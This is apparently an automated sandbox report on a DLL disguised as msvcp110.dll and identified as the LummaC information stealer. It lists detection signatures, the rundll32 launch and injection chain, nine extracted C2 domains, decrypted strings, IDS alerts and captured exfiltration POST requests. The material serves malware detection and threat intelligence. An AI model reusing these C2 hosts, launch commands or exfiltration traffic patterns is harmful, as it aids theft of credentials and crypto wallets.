Edit tour

Windows Analysis Report
msvcp110.dll

Overview

General Information

Sample name:	msvcp110.dll
Analysis ID:	1541486
MD5:	39bda6bbb72a50baa2dd3d3d6d55f17c
SHA1:	a3c63fb05a5a95520da960540117ec128d3c86e4
SHA256:	c95872dc3154d8688ce3ee0d4aa080c62012512a132c92e03db54c09e16891ed
Tags:	dlluser-aachum
Infos:

Detection

LummaC

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

AI detected suspicious sample

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Found many strings related to Crypto-Wallets (likely being stolen)

Injects a PE file into a foreign processes

LummaC encrypted strings found

Machine Learning detection for sample

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to detect virtual machines (SLDT)

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Searches for user specific document files

Shows file infection / information gathering behavior (enumerates multiple directory for files)

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

loaddll32.exe (PID: 6720 cmdline: loaddll32.exe "C:\Users\user\Desktop\msvcp110.dll" MD5: 51E6071F9CBA48E79F10C84515AAE618)

conhost.exe (PID: 4768 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 4424 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\msvcp110.dll",#1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

rundll32.exe (PID: 6972 cmdline: rundll32.exe "C:\Users\user\Desktop\msvcp110.dll",#1 MD5: 889B99C52A60DD49227C5E485A016679)

aspnet_regiis.exe (PID: 6200 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe" MD5: 5D1D74198D75640E889F0A577BBF31FC)

rundll32.exe (PID: 4088 cmdline: rundll32.exe C:\Users\user\Desktop\msvcp110.dll,GetGameData MD5: 889B99C52A60DD49227C5E485A016679)

aspnet_regiis.exe (PID: 2316 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe" MD5: 5D1D74198D75640E889F0A577BBF31FC)

rundll32.exe (PID: 3748 cmdline: rundll32.exe "C:\Users\user\Desktop\msvcp110.dll",GetGameData MD5: 889B99C52A60DD49227C5E485A016679)

aspnet_regiis.exe (PID: 6432 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe" MD5: 5D1D74198D75640E889F0A577BBF31FC)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["arenbootk.sbs", "strikebripm.sbs", "activedomest.sbs", "mediavelk.sbs", "withdrwblon.cyou", "offybirhtdi.sbs", "ostracizez.sbs", "elaboretib.sbs", "definitib.sbs"]}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000007.00000003.2120852736.00000000028A2000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000009.00000003.2154600497.0000000002A74000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000009.00000003.2154648334.0000000002A6B000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000009.00000003.2154718277.0000000002A6E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: aspnet_regiis.exe PID: 6200	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: aspnet_regiis.exe PID: 6200	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: aspnet_regiis.exe PID: 6200	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
Process Memory Space: aspnet_regiis.exe PID: 2316	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: aspnet_regiis.exe PID: 2316	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: aspnet_regiis.exe PID: 2316	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
Process Memory Space: aspnet_regiis.exe PID: 6432	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: aspnet_regiis.exe PID: 6432	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Click to see the 8 entries

Suricata Signatures

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-24T21:59:02.419807+0200	2054653	1	A Network Trojan was detected	192.168.2.5	49705	188.114.97.3	443	TCP
2024-10-24T21:59:02.507601+0200	2054653	1	A Network Trojan was detected	192.168.2.5	49704	188.114.97.3	443	TCP
2024-10-24T21:59:03.847808+0200	2054653	1	A Network Trojan was detected	192.168.2.5	49707	188.114.97.3	443	TCP
2024-10-24T21:59:03.887044+0200	2054653	1	A Network Trojan was detected	192.168.2.5	49706	188.114.97.3	443	TCP
2024-10-24T21:59:04.930985+0200	2054653	1	A Network Trojan was detected	192.168.2.5	49708	188.114.97.3	443	TCP
2024-10-24T21:59:06.725100+0200	2054653	1	A Network Trojan was detected	192.168.2.5	49711	188.114.97.3	443	TCP
2024-10-24T21:59:14.177252+0200	2054653	1	A Network Trojan was detected	192.168.2.5	49724	188.114.97.3	443	TCP
2024-10-24T21:59:14.696311+0200	2054653	1	A Network Trojan was detected	192.168.2.5	49726	188.114.97.3	443	TCP
2024-10-24T21:59:15.814450+0200	2054653	1	A Network Trojan was detected	192.168.2.5	49727	188.114.97.3	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-24T21:59:02.419807+0200	2049836	1	A Network Trojan was detected	192.168.2.5	49705	188.114.97.3	443	TCP
2024-10-24T21:59:02.507601+0200	2049836	1	A Network Trojan was detected	192.168.2.5	49704	188.114.97.3	443	TCP
2024-10-24T21:59:04.930985+0200	2049836	1	A Network Trojan was detected	192.168.2.5	49708	188.114.97.3	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-24T21:59:03.847808+0200	2049812	1	A Network Trojan was detected	192.168.2.5	49707	188.114.97.3	443	TCP
2024-10-24T21:59:03.887044+0200	2049812	1	A Network Trojan was detected	192.168.2.5	49706	188.114.97.3	443	TCP
2024-10-24T21:59:06.725100+0200	2049812	1	A Network Trojan was detected	192.168.2.5	49711	188.114.97.3	443	TCP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-24T21:59:05.410474+0200	2048094	1	Malware Command and Control Activity Detected	192.168.2.5	49709	188.114.97.3	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 5.2.aspnet_regiis.exe.75a70000.0.unpack

Malware Configuration Extractor: LummaC {"C2 url": ["arenbootk.sbs", "strikebripm.sbs", "activedomest.sbs", "mediavelk.sbs", "withdrwblon.cyou", "offybirhtdi.sbs", "ostracizez.sbs", "elaboretib.sbs", "definitib.sbs"]}

Multi AV Scanner detection for submitted file

Source: msvcp110.dll

ReversingLabs: Detection: 63%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: msvcp110.dll

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 00000009.00000002.2194164293.0000000075AB6000.00000002.00000400.00020000.00000000.sdmp	String decryptor: offybirhtdi.sbs
Source: 00000009.00000002.2194164293.0000000075AB6000.00000002.00000400.00020000.00000000.sdmp	String decryptor: activedomest.sbs
Source: 00000009.00000002.2194164293.0000000075AB6000.00000002.00000400.00020000.00000000.sdmp	String decryptor: arenbootk.sbs
Source: 00000009.00000002.2194164293.0000000075AB6000.00000002.00000400.00020000.00000000.sdmp	String decryptor: mediavelk.sbs
Source: 00000009.00000002.2194164293.0000000075AB6000.00000002.00000400.00020000.00000000.sdmp	String decryptor: definitib.sbs
Source: 00000009.00000002.2194164293.0000000075AB6000.00000002.00000400.00020000.00000000.sdmp	String decryptor: elaboretib.sbs
Source: 00000009.00000002.2194164293.0000000075AB6000.00000002.00000400.00020000.00000000.sdmp	String decryptor: strikebripm.sbs
Source: 00000009.00000002.2194164293.0000000075AB6000.00000002.00000400.00020000.00000000.sdmp	String decryptor: ostracizez.sbs
Source: 00000009.00000002.2194164293.0000000075AB6000.00000002.00000400.00020000.00000000.sdmp	String decryptor: withdrwblon.cyou
Source: 00000009.00000002.2194164293.0000000075AB6000.00000002.00000400.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000009.00000002.2194164293.0000000075AB6000.00000002.00000400.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000009.00000002.2194164293.0000000075AB6000.00000002.00000400.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 00000009.00000002.2194164293.0000000075AB6000.00000002.00000400.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000009.00000002.2194164293.0000000075AB6000.00000002.00000400.00020000.00000000.sdmp	String decryptor: Workgroup: -

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Code function: 7_2_75A8D7F8 CryptUnprotectData,

7_2_75A8D7F8

Source: msvcp110.dll

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL

Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49711 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49712 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49713 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49714 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49715 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49716 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49717 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49718 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49719 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49720 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49722 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49721 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49723 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49724 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49725 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49726 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49727 version: TLS 1.2

Source: msvcp110.dll

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Directory queried: number of queries: 2307

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\CEF	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\PeerDistRepub	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Packages	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Comms	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+75E07B5Ch]	7_2_75A7EC20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h	7_2_75AB4C40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-0000008Ah]	7_2_75A7CF90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-42h]	7_2_75A7E1A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then jmp ecx	7_2_75A8104F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx eax, byte ptr [esp+edx+6D44C030h]	7_2_75A9AB20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then cmp dword ptr [edx+ecx*8], 9ABDB589h	7_2_75A9AB20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then jmp eax	7_2_75AAE210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx eax, byte ptr [ebp+ecx-14h]	7_2_75AB3D90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then jmp ecx	7_2_75AB35F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx eax, byte ptr [ebp+ecx-14h]	7_2_75AB35F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+58h]	7_2_75A92520
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov word ptr [ebp+edx*4+00h], ax	7_2_75A7BD50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then add eax, dword ptr [esp+ecx*4+34h]	7_2_75A7BD50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov edx, dword ptr [esp+04h]	7_2_75A714AD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+6D44C02Ch]	7_2_75AAFC90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then cmp byte ptr [esi+eax], 00000000h	7_2_75A9ECE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov ebp, edx	7_2_75AB24E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then jmp ecx	7_2_75A814CE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	7_2_75A9E7B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then jmp ecx	7_2_75AB378A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx eax, byte ptr [ebp+ecx-14h]	7_2_75AB378A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then jmp ecx	7_2_75AB3740
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx eax, byte ptr [ebp+ecx-14h]	7_2_75AB3740
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx ecx, byte ptr [esi+eax]	7_2_75A936AC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h	7_2_75A966E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then jmp edx	7_2_75A78EF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov word ptr [edx], bp	7_2_75A91EC5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov word ptr [ecx], di	7_2_75A91EC5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then jmp ecx	7_2_75AB39C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx eax, byte ptr [ebp+ecx-14h]	7_2_75AB39C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov word ptr [eax], cx	7_2_75A96940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then add ecx, eax	7_2_75A9A083
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax-6Ch]	7_2_75A9A083
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx edx, byte ptr [esi+ebx]	7_2_75A75890
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov word ptr [eax], cx	7_2_75A7E8FF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then add edx, esi	7_2_75A998F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov edx, eax	7_2_75A9702F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx ebx, byte ptr [ecx+edx]	7_2_75AAF020
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov esi, dword ptr [esp+1Ch]	7_2_75AAF020
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx ebx, byte ptr [esi+ecx+38h]	7_2_75A8E07E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then and esi, 001FF800h	7_2_75A74BA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then mov dword ptr [esp+04h], ecx	7_2_75A8FBA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], B62B8D10h	7_2_75A9C3A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+29352E8Dh]	7_2_75AB5330
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then jmp ecx	7_2_75A98290
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 4x nop then movzx eax, byte ptr [ebp+ecx-14h]	7_2_75AB3A90

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49727 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49708 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49706 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49708 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49706 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49724 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49711 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:49709 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49707 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49707 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49704 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49705 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49704 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49705 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49711 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49726 -> 188.114.97.3:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: arenbootk.sbs
Source: Malware configuration extractor	URLs: strikebripm.sbs
Source: Malware configuration extractor	URLs: activedomest.sbs
Source: Malware configuration extractor	URLs: mediavelk.sbs
Source: Malware configuration extractor	URLs: withdrwblon.cyou
Source: Malware configuration extractor	URLs: offybirhtdi.sbs
Source: Malware configuration extractor	URLs: ostracizez.sbs
Source: Malware configuration extractor	URLs: elaboretib.sbs
Source: Malware configuration extractor	URLs: definitib.sbs

Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: withdrwblon.cyou
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: withdrwblon.cyou
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 80Host: withdrwblon.cyou
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 80Host: withdrwblon.cyou
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: withdrwblon.cyou
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12836Host: withdrwblon.cyou
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12836Host: withdrwblon.cyou
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 80Host: withdrwblon.cyou
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15078Host: withdrwblon.cyou
